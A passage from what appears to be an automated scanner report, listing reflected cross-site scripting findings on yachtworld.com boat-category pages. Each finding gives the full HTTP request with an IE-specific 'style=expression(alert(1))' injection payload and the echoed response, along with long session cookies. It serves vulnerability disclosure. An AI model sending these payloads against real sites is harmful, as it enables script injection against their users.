savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:57:35 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:11:41 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&11882"style="x:expression(alert(1))"554fdc86f25&slim=yw&seo=true&N=4573&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.300. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Connecticut/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Connecticut/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a0d"style%3d"x%3aexpression(alert(1))"9668f1bcc4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1a0d"style="x:expression(alert(1))"9668f1bcc4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/Connecticut/1?b1a0d"style%3d"x%3aexpression(alert(1))"9668f1bcc4e=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:03 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:09 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&b1a0d"style="x:expression(alert(1))"9668f1bcc4e&ic=true&slim=yw&seo=true&N=4575&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.301. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Florida/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Florida/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b224"style%3d"x%3aexpression(alert(1))"37c392477d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8b224"style="x:expression(alert(1))"37c392477d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/Florida/1?8b224"style%3d"x%3aexpression(alert(1))"37c392477d4=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:57:13 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:11:20 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?8b224"style="x:expression(alert(1))"37c392477d4&ps=30&ic=true&slim=yw&seo=true&N=4624&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.302. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maine/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Maine/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80da9"style%3d"x%3aexpression(alert(1))"390dde4f621 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80da9"style="x:expression(alert(1))"390dde4f621 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/Maine/1?80da9"style%3d"x%3aexpression(alert(1))"390dde4f621=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:10 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:17 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&slim=yw&80da9"style="x:expression(alert(1))"390dde4f621&seo=true&N=4638&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.303. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maryland/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Maryland/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766f5"style%3d"x%3aexpression(alert(1))"cfb1674b5cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 766f5"style="x:expression(alert(1))"cfb1674b5cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/Maryland/1?766f5"style%3d"x%3aexpression(alert(1))"cfb1674b5cf=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:57:47 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:11:54 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&slim=yw&seo=true&N=4637&sm=3&766f5"style="x:expression(alert(1))"cfb1674b5cf&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.304. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Massachusetts/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
